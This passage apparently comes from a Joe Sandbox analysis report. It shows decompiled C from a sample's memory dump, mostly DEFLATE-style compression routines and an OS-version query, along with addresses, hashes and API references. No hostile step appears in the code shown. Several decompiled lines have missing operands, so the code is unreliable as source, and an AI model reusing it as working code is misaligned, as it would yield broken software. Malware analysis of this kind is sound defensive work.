							 *(_t415 + 0x3c) =  *(_t415 + 0x3c) ^ 0x0000ffff;
							_t407 = _t407 - 1;
						} while (_t407 != 0);
						if( *(_t415 + 0x3c) > _t407) {
							do {
								_t387 =  *(_t415 + 0x44);
								 *(_t415 + 0x48) =  *(_t415 + 0x48) | ( *(( *((intOrPtr*)(_t415 + 0x40)) + _t407 & 0x00007fff) + _t415 + 0x90) & 0x000000ff) << _t387;
								_t147 = _t387 + 8; // 0x10
								_t340 = _t147;
								 *(_t415 + 0x44) = _t340;
								if(_t340 >= 8) {
									do {
										_t388 =  *((intOrPtr*)(_t415 + 0x30));
										if(_t388 <  *((intOrPtr*)(_t415 + 0x34))) {
											 *_t388 =  *(_t415 + 0x48);
											 *((intOrPtr*)(_t415 + 0x30)) =  *((intOrPtr*)(_t415 + 0x30)) + 1;
										}
										 *(_t415 + 0x48) =  *(_t415 + 0x48) >> 8;
										 *(_t415 + 0x44) =  *(_t415 + 0x44) + 0xfffffff8;
									} while ( *(_t415 + 0x44) >= 8);
								}
								_t407 = _t407 + 1;
							} while (_t407 <  *(_t415 + 0x3c));
						}
					}
				} else {
					if(( *(_t415 + 8) & 0x00040000) != 0 ||  *(_t415 + 0x3c) < 0x30) {
						E00986A80(_t415);
					} else {
						E00985B10(_t415);
					}
					_t416 = _t416 + 4;
					_t285 = E00986C30(_t415);
					_t408 =  *(_t415 + 0x3c);
					_v12 = _t285;
					if(_t408 == 0 ||  *((intOrPtr*)(_t415 + 0x30)) - _t409 + 1 < _t408) {
						L58:
						if(_t285 == 0) {
							 *((intOrPtr*)(_t415 + 0x30)) = _t409;
							 *(_t415 + 0x48) = _v16;
							 *(_t415 + 0x44) = _t364;
							E00986A80(_t415);
							_t416 = _t416 + 4;
							E00986C30(_t415);
						}
					} else {
						_t403 = _v16;
						goto L31;
					}
				}
				_t286 = _v24;
				if(_t286 != 0) {
					_t374 =  *(_t415 + 0x44);
					if(_t286 != 4) {
						_t413 = 0;
						 *(_t415 + 0x48) =  *(_t415 + 0x48) | 0 << _t374;
						_t308 = _t374 + 3;
						 *(_t415 + 0x44) = _t308;
						if(_t308 >= 8) {
							do {
								_t379 =  *((intOrPtr*)(_t415 + 0x30));
								if(_t379 <  *((intOrPtr*)(_t415 + 0x34))) {
									 *_t379 =  *(_t415 + 0x48);
									 *((intOrPtr*)(_t415 + 0x30)) =  *((intOrPtr*)(_t415 + 0x30)) + 1;
								}
								 *(_t415 + 0x48) =  *(_t415 + 0x48) >> 8;
								 *(_t415 + 0x44) =  *(_t415 + 0x44) + 0xfffffff8;
							} while ( *(_t415 + 0x44) >= 8);
						}
						_t375 =  *(_t415 + 0x44);
						if(_t375 != 0) {
							 *(_t415 + 0x44) = 8;
							 *(_t415 + 0x48) =  *(_t415 + 0x48) | 0 << _t375;
							do {
								_t378 =  *((intOrPtr*)(_t415 + 0x30));
								if(_t378 <  *((intOrPtr*)(_t415 + 0x34))) {
									 *_t378 =  *(_t415 + 0x48);
									 *((intOrPtr*)(_t415 + 0x30)) =  *((intOrPtr*)(_t415 + 0x30)) + 1;
								}
								 *(_t415 + 0x48) =  *(_t415 + 0x48) >> 8;
								 *(_t415 + 0x44) =  *(_t415 + 0x44) + 0xfffffff8;
							} while ( *(_t415 + 0x44) >= 8);
						}
						_t405 = 2;
						do {
							_t376 =  *(_t415 + 0x44);
							 *(_t415 + 0x48) =  *(_t415 + 0x48) | (_t413 & 0x0000ffff) << _t376;
							_t230 = _t376 + 0x10; // 0x18
							_t311 = _t230;
							 *(_t415 + 0x44) = _t311;
							if(_t311 >= 8) {
								do {
									_t377 =  *((intOrPtr*)(_t415 + 0x30));
									if(_t377 <  *((intOrPtr*)(_t415 + 0x34))) {
										 *_t377 =  *(_t415 + 0x48);
										 *((intOrPtr*)(_t415 + 0x30)) =  *((intOrPtr*)(_t415 + 0x30)) + 1;
									}
									 *(_t415 + 0x48) =  *(_t415 + 0x48) >> 8;
									 *(_t415 + 0x44) =  *(_t415 + 0x44) + 0xfffffff8;
								} while ( *(_t415 + 0x44) >= 8);
							}
							_t413 = _t413 ^ 0x0000ffff;
							_t405 = _t405 - 1;
						} while (_t405 != 0);
					} else {
						if(_t374 != 0) {
							 *(_t415 + 0x44) = 8;
							 *(_t415 + 0x48) =  *(_t415 + 0x48) | 0 << _t374;
							do {
								_t382 =  *((intOrPtr*)(_t415 + 0x30));
								if(_t382 <  *((intOrPtr*)(_t415 + 0x34))) {
									 *_t382 =  *(_t415 + 0x48);
									 *((intOrPtr*)(_t415 + 0x30)) =  *((intOrPtr*)(_t415 + 0x30)) + 1;
								}
								 *(_t415 + 0x48) =  *(_t415 + 0x48) >> 8;
								 *(_t415 + 0x44) =  *(_t415 + 0x44) + 0xfffffff8;
							} while ( *(_t415 + 0x44) >= 8);
						}
						if(( *(_t415 + 8) & 0x00001000) != 0) {
							_t406 =  *(_t415 + 0x18);
							_t414 = 4;
							do {
								_t380 =  *(_t415 + 0x44);
								 *(_t415 + 0x48) =  *(_t415 + 0x48) | _t406 >> 0x00000018 << _t380;
								_t187 = _t380 + 8; // 0x10
								_t320 = _t187;
								 *(_t415 + 0x44) = _t320;
								if(_t320 >= 8) {
									do {
										_t381 =  *((intOrPtr*)(_t415 + 0x30));
										if(_t381 <  *((intOrPtr*)(_t415 + 0x34))) {
											 *_t381 =  *(_t415 + 0x48);
											 *((intOrPtr*)(_t415 + 0x30)) =  *((intOrPtr*)(_t415 + 0x30)) + 1;
										}
										 *(_t415 + 0x48) =  *(_t415 + 0x48) >> 8;
										 *(_t415 + 0x44) =  *(_t415 + 0x44) + 0xfffffff8;
									} while ( *(_t415 + 0x44) >= 8);
								}
								_t406 = _t406 << 8;
								_t414 = _t414 - 1;
							} while (_t414 != 0);
						}
					}
				}
				memset(_t415 + 0x8192, 0, 0x240);
				memset(_t415 + 0x83d2, 0, 0x40);
				 *((intOrPtr*)(_t415 + 0x64)) =  *((intOrPtr*)(_t415 + 0x64)) + 1;
				 *((intOrPtr*)(_t415 + 0x28)) = _t415 + 0x9273;
				 *(_t415 + 0x2c) = _t415 + 0x9272;
				 *((intOrPtr*)(_t415 + 0x40)) =  *((intOrPtr*)(_t415 + 0x40)) +  *(_t415 + 0x3c);
				_t294 = _v20;
				 *(_t415 + 0x38) = 8;
				 *(_t415 + 0x3c) = 0;
				_t366 =  *((intOrPtr*)(_t415 + 0x30)) - _t294;
				if(_t366 == 0) {
					L98:
					return  *(_t415 + 0x5c);
				} else {
					if( *_t415 == 0) {
						_t404 = _t415 + 0x39272;
						if(_t294 != _t404) {
							 *((intOrPtr*)(_t415 + 0x8c)) =  *((intOrPtr*)(_t415 + 0x8c)) + _t366;
							goto L98;
						} else {
							_t371 =  *((intOrPtr*)(_t415 + 0x8c));
							_t412 =  <  ? _t366 :  *((intOrPtr*)( *((intOrPtr*)(_t415 + 0x7c)))) - _t371;
							memcpy( *((intOrPtr*)(_t415 + 0x74)) + _t371, _t404, _t412);
							 *((intOrPtr*)(_t415 + 0x8c)) =  *((intOrPtr*)(_t415 + 0x8c)) + _t412;
							_t367 = _t366 - _t412;
							if(_t367 == 0) {
								goto L98;
							} else {
								 *(_t415 + 0x58) = _t412;
								 *(_t415 + 0x5c) = _t367;
								return _t367;
							}
						}
					} else {
						 *((intOrPtr*)( *((intOrPtr*)(_t415 + 0x78)))) =  *((intOrPtr*)(_t415 + 0x84)) -  *((intOrPtr*)(_t415 + 0x70));
						_t304 =  *((intOrPtr*)( *_t415))(_t415 + 0x39272, _t366,  *((intOrPtr*)(_t415 + 4)));
						if(_t304 != 0) {
							goto L98;
						} else {
							 *((intOrPtr*)(_t415 + 0x6c)) = 0xffffffff;
							return _t304 | 0xffffffff;
						}
					}
				}
			}

0x00986e70
0x00986e78
0x00986e7a
0x00986e7e
0x00986e8c
0x00986ea0
0x00986ea0
0x00986e8e
0x00986e94
0x00986e9e
0x00000000
0x00000000
0x00986e9e
0x00986eaa
0x00986ec7
0x00986ec7
0x00986eac
0x00986eaf
0x00986ebe
0x00000000
0x00986ec0
0x00986ec3
0x00986ec3
0x00986ebe
0x00986ed0
0x00986ed3
0x00986edb
0x00986ee1
0x00986ee8
0x00986eef
0x00986efa
0x00986f04
0x00986f0c
0x00986f16
0x00986f19
0x00986f1c
0x00986f22
0x00986f24
0x00986f24
0x00986f2a
0x00986f2f
0x00986f31
0x00986f31
0x00986f34
0x00986f38
0x00986f3c
0x00986f24
0x00986f42
0x00986f4c
0x00986f4f
0x00986f4f
0x00986f52
0x00986f58
0x00986f60
0x00986f60
0x00986f66
0x00986f6b
0x00986f6d
0x00986f6d
0x00986f70
0x00986f74
0x00986f78
0x00986f60
0x00986f58
0x00986f7e
0x00986f8b
0x00986f8e
0x00986f8e
0x00986f91
0x00986f97
0x00986fa0
0x00986fa0
0x00986fa6
0x00986fab
0x00986fad
0x00986fad
0x00986fb0
0x00986fb4
0x00986fb8
0x00986fa0
0x00986fc2
0x00986fc5
0x00986fc8
0x00986fcb
0x00986fce
0x00987016
0x0098701f
0x0098712b
0x00000000
0x00987025
0x00987027
0x00987030
0x00987033
0x00987036
0x0098703c
0x00987040
0x00987040
0x00987046
0x0098704b
0x0098704d
0x0098704d
0x00987050
0x00987054
0x00987058
0x00987040
0x0098705e
0x00987063
0x00987067
0x00987070
0x00987073
0x00987073
0x00987079
0x0098707e
0x00987080
0x00987080
0x00987083
0x00987087
0x0098708b
0x00987073
0x00987091
0x00987096
0x00987096
0x0098709f
0x009870a2
0x009870a2
0x009870a5
0x009870ab
0x009870b0
0x009870b0
0x009870b6
0x009870bb
0x009870bd
0x009870bd
0x009870c0
0x009870c4
0x009870c8
0x009870b0
0x009870ce
0x009870d5
0x009870d5
0x009870db
0x009870e0
0x009870e3
0x009870f7
0x009870fa
0x009870fa
0x009870fd
0x00987103
0x00987105
0x00987105
0x0098710b
0x00987110
0x00987112
0x00987112
0x00987115
0x00987119
0x0098711d
0x00987105
0x00987123
0x00987124
0x00987129
0x009870db
0x00986fd0
0x00986fd7
0x00986fe8
0x00986fdf
0x00986fe0
0x00986fe0
0x00986fed
0x00986ff2
0x00986ff7
0x00986ffa
0x00986fff
0x0098712e
0x00987130
0x00987136
0x00987139
0x0098713c
0x0098713f
0x00987144
0x00987149
0x00987149
0x00987013
0x00987013
0x00000000
0x00987013
0x00986fff
0x0098714e
0x00987153
0x00987159
0x0098715f
0x009871f3
0x009871f7
0x009871fa
0x009871fd
0x00987203
0x00987205
0x00987205
0x0098720b
0x00987210
0x00987212
0x00987212
0x00987215
0x00987219
0x0098721d
0x00987205
0x00987223
0x00987228
0x0098722c
0x00987235
0x00987238
0x00987238
0x0098723e
0x00987243
0x00987245
0x00987245
0x00987248
0x0098724c
0x00987250
0x00987238
0x00987256
0x00987260
0x00987260
0x00987268
0x0098726b
0x0098726b
0x0098726e
0x00987274
0x00987276
0x00987276
0x0098727c
0x00987281
0x00987283
0x00987283
0x00987286
0x0098728a
0x0098728e
0x00987276
0x00987294
0x0098729a
0x0098729a
0x00987165
0x00987167
0x0098716b
0x00987174
0x00987177
0x00987177
0x0098717d
0x00987182
0x00987184
0x00987184
0x00987187
0x0098718b
0x0098718f
0x00987177
0x0098719c
0x009871a2
0x009871a5
0x009871b0
0x009871b0
0x009871ba
0x009871bd
0x009871bd
0x009871c0
0x009871c6
0x009871c8
0x009871c8
0x009871ce
0x009871d3
0x009871d5
0x009871d5
0x009871d8
0x009871dc
0x009871e0
0x009871c8
0x009871e6
0x009871e9
0x009871e9
0x009871ec
0x0098719c
0x0098715f
0x009872ab
0x009872bc
0x009872cb
0x009872d1
0x009872da
0x009872e0
0x009872e3
0x009872e6
0x009872ed
0x009872f4
0x009872f6
0x00987382
0x0098738b
0x009872fc
0x009872ff
0x00987336
0x0098733e
0x0098737c
0x00000000
0x00987340
0x00987343
0x00987352
0x0098735a
0x00987360
0x00987369
0x0098736b
0x00000000
0x0098736d
0x0098736d
0x00987373
0x0098737b
0x0098737b
0x0098736b
0x00987301
0x0098730d
0x0098731c
0x00987323
0x00000000
0x00987326
0x00987326
0x00987335
0x00987335
0x00987323
0x009872ff

APIs

memset.NTDLL ref: 009872AB
memset.NTDLL ref: 009872BC

Memory Dump Source

Source File: 00000001.00000002.327566145.0000000000981000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true

Associated: 00000001.00000002.327562401.0000000000980000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.327573949.000000000098B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.327578195.000000000098C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.327581634.000000000098D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_980000_vEjGZyD0iN.jbxd

Yara matches

Similarity

API ID: memset
String ID:
API String ID: 2221118986-0
Opcode ID: 421075e8bd292e7c1c7400ccc7933a267c6d750fa2e2b59b1ee2fb86af648f5c
Instruction ID: 0d633849e5426ddf8391c5b472760cc00596fd76c53b918a23f9e43189f1d336
Opcode Fuzzy Hash: 421075e8bd292e7c1c7400ccc7933a267c6d750fa2e2b59b1ee2fb86af648f5c
Instruction Fuzzy Hash: 0C023F30505B118FCB35DE69C684666F7F1BF55724B600A2EC6A78AFA1D236F845CF10

Uniqueness

Uniqueness Score: -1.00%

Function 00988D50, Relevance: 3.0, APIs: 2, Instructions: 39COMMON

Download Yara Rule

APIs

RtlGetVersion.NTDLL(?), ref: 00988D6D
GetNativeSystemInfo.KERNEL32(?), ref: 00988D77

Memory Dump Source

Source File: 00000001.00000002.327566145.0000000000981000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true

Associated: 00000001.00000002.327562401.0000000000980000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.327573949.000000000098B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.327578195.000000000098C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.327581634.000000000098D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_980000_vEjGZyD0iN.jbxd

Yara matches

Similarity

API ID: InfoNativeSystemVersion
String ID:
API String ID: 2296905803-0
Opcode ID: b8afdf9bb911bdddf767cf7ae40a7f4765a1bceb910a37dcfd11d8b6774b876f
Instruction ID: 5f76fe1e4271aa5caf011ce882f2b73224fe86e6cfdcf6af74d918e9590fa34a
Opcode Fuzzy Hash: b8afdf9bb911bdddf767cf7ae40a7f4765a1bceb910a37dcfd11d8b6774b876f
Instruction Fuzzy Hash: 3DF03173D245184BF751CF6ACC496C8B7F9E788304F0481A0E42DF6609D6B4EA15DB50

Uniqueness

Uniqueness Score: -1.00%

Function 009877F0, Relevance: .6, Instructions: 581
COMMONCrypto

Download Yara Rule

C-Code - Quality: 99%

			E009877F0(intOrPtr* __ecx) {
				signed int _v8;
				intOrPtr* _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				intOrPtr* _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr _v48;
				signed int _v52;
				signed int _v56;
				char _v60;
				signed int _v64;
				signed int _v68;
				intOrPtr _v72;
				intOrPtr* _v76;
				intOrPtr _t375;
				signed int _t380;
				signed int _t381;
				signed int _t382;
				signed int _t390;
				void* _t402;
				signed int _t410;
				unsigned int* _t411;
				unsigned int* _t420;
				signed int _t432;
				unsigned int* _t434;
				unsigned int* _t451;
				unsigned int* _t453;
				void* _t463;
				void* _t480;
				signed int _t483;
				signed int _t494;
				signed char _t504;
				signed int _t508;
				signed int _t509;
				signed char _t510;
				signed int _t511;
				signed int _t513;
				signed int _t514;
				intOrPtr* _t516;
				intOrPtr* _t517;
				intOrPtr _t520;
				intOrPtr _t522;
				intOrPtr _t523;
				signed int _t524;
				signed int _t528;
				signed char* _t531;
				void* _t534;
				signed char _t538;
				signed char _t543;
				void* _t548;
				void* _t550;
				intOrPtr* _t551;
				intOrPtr _t555;
				intOrPtr _t556;
				intOrPtr _t557;
				intOrPtr _t558;
				signed int _t564;
				intOrPtr* _t567;
				intOrPtr* _t571;
				intOrPtr _t572;
				signed int _t573;
				signed int _t575;
				signed int _t576;
				signed int _t579;
				signed int _t582;
				intOrPtr _t585;
				signed int _t587;
				signed int _t590;
				signed int _t591;
				signed int _t592;
				void* _t594;
				signed int _t595;
				signed int _t600;
				intOrPtr _t601;
				signed int _t602;
				signed int _t603;
				signed int _t604;
				signed int _t605;
				signed int _t606;
				signed int _t608;
				signed int _t610;
				intOrPtr* _t612;

				_t612 = __ecx;
				_v76 = __ecx;
				_t571 =  *((intOrPtr*)(__ecx + 0x84));
				_t601 =  *((intOrPtr*)(__ecx + 0x88));
				_t375 =  *((intOrPtr*)(__ecx + 0x80));
				_v12 = _t571;
				_v20 = _t601;
				_v48 = _t375;
				L2:
				while(_t601 != 0 || _t375 != 0 &&  *((intOrPtr*)(_t612 + 0x20)) != _t601) {
					_t520 =  *((intOrPtr*)(_t612 + 0x20));
					if( *((intOrPtr*)(_t612 + 0x24)) + _t520 < 2) {
						if(_t601 != 0) {
							while(1) {
								_t557 =  *((intOrPtr*)(_t612 + 0x20));
								if(_t557 >= 0x102) {
									goto L11;
								}
								_t601 = _t601 - 1;
								_t510 =  *_t571;
								_t483 =  *(_t612 + 0x1c) + _t557 & 0x00007fff;
								_v20 = _t601;
								_t571 = _t571 + 1;
								_v12 = _t571;
								 *(_t483 + _t612 + 0x90) = _t510;
								if(_t483 < 0x101) {
									 *(_t483 + _t612 + 0x8090) = _t510;
								}
								 *((intOrPtr*)(_t612 + 0x20)) =  *((intOrPtr*)(_t612 + 0x20)) + 1;
								_t558 =  *((intOrPtr*)(_t612 + 0x20));
								if( *((intOrPtr*)(_t612 + 0x24)) + _t558 >= 3) {
									_t608 =  *(_t612 + 0x1c) + _t558 + 0xfffffffd;
									_t579 = _t608 & 0x00007fff;
									_t89 = _t608 + 1; // 0x11
									_t564 = (( *(_t579 + _t612 + 0x90) & 0x000000ff) << 0x0000000a ^ _t510 & 0x000000ff) & 0x00007fff ^ ( *((_t89 & 0x00007fff) + _t612 + 0x90) & 0xff) << 0x00000005;
									 *((short*)(_t612 + 0x19272 + _t579 * 2)) =  *(_t612 + 0x29272 + _t564 * 2);
									_t571 = _v12;
									 *(_t612 + 0x29272 + _t564 * 2) = _t608;
									_t601 = _v20;
								}
								if(_t601 != 0) {
									continue;
								} else {
								}
								goto L11;
							}
						}
					} else {
						_t494 =  *(_t612 + 0x1c) + _t520;
						_t610 = _t494 & 0x00007fff;
						_t13 = _t494 - 2; // 0xe
						_t511 = _t13;
						_t16 = _t511 + 1; // 0xf
						_t582 = ( *((_t511 & 0x00007fff) + _t612 + 0x90) & 0x000000ff) << 0x00000005 ^  *((_t16 & 0x00007fff) + _t612 + 0x90) & 0x000000ff;
						_t502 =  <  ? _v20 : 0x102 - _t520;
						_v20 = _v20 - 0x102;
						_t503 = ( <  ? _v20 : 0x102 - _t520) +  *((intOrPtr*)(_t612 + 0x20));
						_v56 = _v12 + 0x102;
						_t567 = _v12;
						 *((intOrPtr*)(_t612 + 0x20)) = ( <  ? _v20 : 0x102 - _t520) +  *((intOrPtr*)(_t612 + 0x20));
						while(_t567 != _v56) {
							_t504 =  *_t567;
							_v12 = _t567 + 1;
							 *(_t612 + _t610 + 0x90) = _t504;
							if(_t610 < 0x101) {
								 *(_t610 + _t612 + 0x8090) = _t504;
							}
							_t582 = (_t582 << 0x00000005 ^ _t504 & 0x000000ff) & 0x00007fff;
							_t610 = _t610 + 0x00000001 & 0x00007fff;
							 *((short*)(_t612 + 0x19272 + (_t511 & 0x00007fff) * 2)) =  *(_t612 + 0x29272 + _t582 * 2);
							_t567 = _v12;
							 *(_t612 + 0x29272 + _t582 * 2) = _t511;
							_t511 = _t511 + 1;
						}
						_t601 = _v20;
					}
					L11:
					_t572 =  *((intOrPtr*)(_t612 + 0x20));
					_t522 =  <  ? 0x8000 - _t572 :  *((intOrPtr*)(_t612 + 0x24));
					_v24 = _t522;
					 *((intOrPtr*)(_t612 + 0x24)) = _t522;
					if(_v48 != 0 || _t572 >= 0x102) {
						_t380 =  *((intOrPtr*)(_t612 + 0x50));
						_t602 = 0;
						_v64 = _t380;
						_v56 = 1;
						_t508 =  !=  ? _t380 : 2;
						_v8 = 0;
						_t381 =  *(_t612 + 0x1c);
						_v28 = _t381;
						_v28 = _v28 & 0x00007fff;
						_v16 = 2;
						if(( *(_t612 + 8) & 0x00090000) == 0) {
							_t382 = _t381 & 0x00007fff;
							_t523 = _v24;
							_v32 = _t382;
							_t603 = _t382;
							_v52 = 2;
							asm("sbb eax, eax");
							_v60 =  *((intOrPtr*)(_t612 + 0x10 + _t382 * 4));
							_v72 = _t612 + 0x90;
							_v44 =  *(_t603 + 2 + _t612 + 0x8f) & 0x0000ffff;
							_v68 =  *(_t612 + _t603 + 0x90) & 0x0000ffff;
							if(_t572 > 2) {
								while(1) {
									_t125 =  &_v60;
									 *_t125 = _v60 - 1;
									if( *_t125 == 0) {
										goto L33;
									}
									_t604 =  *(_t612 + 0x19272 + _t603 * 2) & 0x0000ffff;
									if(_t604 == 0) {
										goto L33;
									} else {
										_t592 =  *(_t612 + 0x1c) - _t604 & 0x0000ffff;
										_v40 = _t592;
										if(_t592 > _t523) {
											goto L33;
										} else {
											_t603 = _t604 & 0x00007fff;
											_t548 = _v52 + _t612;
											if( *((intOrPtr*)(_t548 + _t603 + 0x8f)) == _v44) {
												L51:
												if(_t592 == 0) {
													goto L33;
												} else {
													_t523 = _v24;
													_t516 = _t612 + 0x90 + _t603;
													if( *_t516 != _v68) {
														_t508 = _v16;
														continue;
													} else {
														_t550 = _v32 + _t612 + 0x90;
														_t594 = 0x20;
														while(1) {
															_t160 = _t550 + 2; // 0x7401fe83
															_t551 = _t550 + 2;
															_t517 = _t516 + 2;
															if( *_t160 !=  *_t517) {
																break;
															}
															_t161 = _t551 + 2; // 0xfe83f08b
															_t551 = _t551 + 2;
															_t517 = _t517 + 2;
															if( *_t161 ==  *_t517) {
																_t162 = _t551 + 2; // 0xf08bffff
																_t551 = _t551 + 2;
																_t517 = _t517 + 2;
																if( *_t162 ==  *_t517) {
																	_t163 = _t551 + 2; // 0xfffffe61
																	_t551 = _t551 + 2;
																	_t517 = _t517 + 2;
																	if( *_t163 ==  *_t517) {
																		_t594 = _t594 - 1;
																		if(_t594 != 0) {
																			continue;
																		}
																	}
																}
															}
															break;
														}
														_v36 = _t551;
														_t595 = _v40;
														if(_t594 == 0) {
															_t602 = _t595;
															_t508 =  <  ?  *((void*)(_t612 + 0x20)) : 0x102;
															_v16 = 0x102;
															goto L34;
														} else {
															_t612 = _v76;
															_t508 = _v16;
															_t463 = (0 |  *_t551 ==  *_t517) + (_t551 - _v72 + _v32 >> 1) * 2;
															_t523 = _v24;
															if(_t463 <= _v52) {
																continue;
															} else {
																_v8 = _v40;
																_t555 =  *((intOrPtr*)(_t612 + 0x20));
																_t600 =  <  ? _t555 : _t463;
																_v52 = _t600;
																_t508 = _t600;
																_v16 = _t508;
																if(_t600 == _t555) {
																	goto L33;
																} else {
																	_t523 = _v24;
																	_t184 = _t612 + 0x8f; // 0x98279020
																	_v44 =  *(_v32 + _t600 + _t184) & 0x0000ffff;
																	continue;
																}
															}
														}
													}
												}
											} else {
												_t605 =  *(_t612 + 0x19272 + _t603 * 2) & 0x0000ffff;
												if(_t605 == 0) {
													goto L33;
												} else {
													_t592 =  *(_t612 + 0x1c) - _t605 & 0x0000ffff;
													_v40 = _t592;
													if(_t592 > _v24) {
														goto L33;
													} else {
														_t603 = _t605 & 0x00007fff;
														if( *((intOrPtr*)(_t548 + _t603 + 0x8f)) == _v44) {
															goto L51;
														} else {
															_t606 =  *(_t612 + 0x19272 + _t603 * 2) & 0x0000ffff;
															if(_t606 == 0) {
																goto L33;
															} else {
																_t592 =  *(_t612 + 0x1c) - _t606 & 0x0000ffff;
																_v40 = _t592;
																if(_t592 > _v24) {
																	goto L33;
																} else {
																	_t603 = _t606 & 0x00007fff;
																	_t523 = _v24;
																	if( *((intOrPtr*)(_t548 + _t603 + 0x8f)) != _v44) {
																		continue;
																	} else {
																		goto L51;
																	}
																}
															}
														}
													}
												}
											}
										}
									}
									L95:
									 *(_t612 + 0x1c) =  *(_t612 + 0x1c) + _t528;
									 *((intOrPtr*)(_t612 + 0x20)) =  *((intOrPtr*)(_t612 + 0x20)) - _t528;
									_t402 =  *((intOrPtr*)(_t612 + 0x24)) + _t528;
									_t530 =  <  ? _t402 : 0x8000;
									 *((intOrPtr*)(_t612 + 0x24)) =  <  ? _t402 : 0x8000;
									_t531 =  *(_t612 + 0x28);
									if(_t531 > _t612 + 0x1926a) {
										L99:
										_t601 = _v20;
										 *((intOrPtr*)(_t612 + 0x84)) = _v12;
										 *((intOrPtr*)(_t612 + 0x88)) = _t601;
										_t534 = E00986E70(_t612, 0);
										if(_t534 != 0) {
											return 0 | _t534 > 0x00000000;
										} else {
											_t375 = _v48;
											goto L1;
										}
									} else {
										_t585 =  *((intOrPtr*)(_t612 + 0x3c));
										_t601 = _v20;
										_t375 = _v48;
										if(_t585 <= 0x7c00) {
											L1:
											_t571 = _v12;
											goto L2;
										} else {
											if((_t531 - _t612 - 0x9272) * 0x73 >> 7 >= _t585) {
												goto L99;
											} else {
												_t375 = _v48;
												if(( *(_t612 + 8) & 0x00080000) == 0) {
													goto L1;
												} else {
													goto L99;
												}
											}
										}
									}
									goto L103;
								}
								goto L33;
							} else {
								L33:
								_t602 = _v8;
							}
							goto L34;
						} else {
							if(_t522 == 0 || ( *(_t612 + 8) & 0x00080000) != 0) {
								L34:
								if(_t508 != 3 || _t602 < 0x2000) {
									goto L36;
								} else {
									_t573 = _v28;
									_t524 =  *(_t612 + 8);
									goto L65;
								}
							} else {
								_t508 = 0;
								_v16 = 0;
								_t556 =  *((intOrPtr*)((_v28 - 0x00000001 & 0x00007fff) + _t612 + 0x90));
								if(_t572 == 0) {
									L31:
									_t508 = 0;
									_v16 = 0;
									L36:
									_t573 = _v28;
									_t524 =  *(_t612 + 8);
									if(_t573 == _t602) {
										L65:
										_t508 = 0;
										_t602 = 0;
										_v16 = 0;
									} else {
										if((_t524 & 0x00020000) != 0 && _t508 <= 5) {
											goto L65;
										}
									}
								} else {
									_t480 = _v28 + _t612;
									while( *((intOrPtr*)(_t480 + _t508 + 0x90)) == _t556) {
										_t508 = _t508 + 1;
										if(_t508 < _t572) {
											continue;
										}
										break;
									}
									_v16 = _t508;
									if(_t508 < 3) {
										goto L31;
									} else {
										_t602 = 1;
										goto L34;
									}
								}
							}
						}
						_t390 = _v64;
						if(_t390 == 0) {
							if(_t602 != 0) {
								if( *((intOrPtr*)(_t612 + 0x14)) != 0 || (_t524 & 0x00010000) != 0 || _t508 >= 0x80) {
									_t316 = _t508 - 3; // -3
									 *((intOrPtr*)(_t612 + 0x3c)) =  *((intOrPtr*)(_t612 + 0x3c)) + _t508;
									_t319 = _t602 - 1; // -1
									_t509 = _t319;
									_t575 = _t509 >> 8;
									 *( *(_t612 + 0x28)) = _t316;
									( *(_t612 + 0x28))[1] = _t509;
									( *(_t612 + 0x28))[2] = _t575;
									 *(_t612 + 0x28) =  &(( *(_t612 + 0x28))[3]);
									 *( *(_t612 + 0x2c)) =  *( *(_t612 + 0x2c)) >> 0x00000001 | 0x00000080;
									_t327 = _t612 + 0x38;
									 *_t327 =  *((intOrPtr*)(_t612 + 0x38)) - 1;
									if( *_t327 == 0) {
										_t411 =  *(_t612 + 0x28);
										 *(_t612 + 0x2c) = _t411;
										 *((intOrPtr*)(_t612 + 0x38)) = 8;
										 *(_t612 + 0x28) =  &(_t411[0]);
									}
									_t576 = _t575 & 0x0000007f;
									_t333 = (_t509 & 0x000001ff) + 0x98b220; // 0x201001d
									_t334 = _t576 + 0x98b1a0; // 0x12000000
									_t400 =  <  ?  *_t333 & 0x000000ff :  *_t334 & 0x000000ff;
									_t528 = _v16;
									 *((short*)(_t612 + 0x83d2 + ( <  ?  *_t333 & 0x000000ff :  *_t334 & 0x000000ff) * 2)) =  *((short*)(_t612 + 0x83d2 + ( <  ?  *_t333 & 0x000000ff :  *_t334 & 0x000000ff) * 2)) + 1;
									if(_t528 >= 3) {
										_t410 =  *(0x98b41a + _t528 * 2) & 0x0000ffff;
										goto L94;
									}
								} else {
									_t528 = _v56;
									_t414 =  <  ? _t573 : 0x8100;
									 *(_t612 + 0x54) =  *(( <  ? _t573 : 0x8100) + _t612 + 0x90) & 0x000000ff;
									 *((intOrPtr*)(_t612 + 0x4c)) = _t602;
									 *((intOrPtr*)(_t612 + 0x50)) = _t508;
								}
							} else {
								_t417 =  <  ? _t573 : 0x8100;
								_t538 =  *(( <  ? _t573 : 0x8100) + _t612 + 0x90);
								 *((intOrPtr*)(_t612 + 0x3c)) =  *((intOrPtr*)(_t612 + 0x3c)) + 1;
								 *( *(_t612 + 0x28)) = _t538;
								 *(_t612 + 0x28) =  &(( *(_t612 + 0x28))[1]);
								 *( *(_t612 + 0x2c)) =  *( *(_t612 + 0x2c)) >> 1;
								_t299 = _t612 + 0x38;
								 *_t299 =  *((intOrPtr*)(_t612 + 0x38)) - 1;
								if( *_t299 == 0) {
									_t420 =  *(_t612 + 0x28);
									 *(_t612 + 0x2c) = _t420;
									 *((intOrPtr*)(_t612 + 0x38)) = 8;
									 *(_t612 + 0x28) =  &(_t420[0]);
								}
								_t410 = _t538 & 0x000000ff;
								_t528 = _v56;
								L94:
								 *((short*)(_t612 + 0x8192 + _t410 * 2)) =  *((short*)(_t612 + 0x8192 + _t410 * 2)) + 1;
							}
						} else {
							if(_t508 <= _t390) {
